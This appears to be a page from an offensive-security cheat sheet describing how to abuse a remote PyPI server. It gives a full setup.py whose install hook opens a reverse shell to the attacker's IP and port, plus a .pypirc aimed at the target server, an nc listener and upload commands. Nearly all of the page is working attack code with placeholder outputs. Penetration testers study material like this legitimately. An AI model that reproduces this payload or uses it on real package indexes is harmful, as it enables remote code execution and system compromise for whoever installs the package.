Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1: Remote Pypi Server
1. Create files
mkdir evil_package
Sample Output:
TO-DOmkdir evil_package/evil_package
Sample Output:
TO-DOcd evil_package
Sample Output:
TO-DOtouch README.md
Sample Output:
TO-DOtouch evil_package/__init__.py
Sample Output:
TO-DOtouch setup.cfg
Sample Output:
TO-DOtouch setup.py
Sample Output:
TO-DO2. Replace setup.py
#!/usr/bin/env python3
from setuptools.command.install import install
from setuptools import setup
import os
import socket
import subprocess
class Exploit(install):
def run(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<LOCAL_IP>",<LOCAL_PORT>)) # CHANGE HERE
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh", "-i"])
setup(name="evil_package",
version="1.0.0",
description="Evil Package",
author="user",
author_email="user@<DOMAIN>",
url="http://<DOMAIN>",
license="MIT",
zip_safe=False,
cmdclass={"install": Exploit})
Sample Output:
TO-DO3. Create ~/.pypirc
[distutils]
index-servers =
<EXAMPLE>
[<EXAMPLE>]
repository: http://<TARGET_DOMAIN>
username: <USER>
password: <PASSWORD>
Sample Output:
TO-DO4. Exploit
# Open a nc listener
rlwrap nc -lvnp <LOCAL_PORT>
Sample Output:
TO-DO# Create an archive
python3 setup.py sdist
Sample Output:
TO-DO# Upload
python3 setup.py sdist upload -r <EXAMPLE>
Sample Output:
TO-DO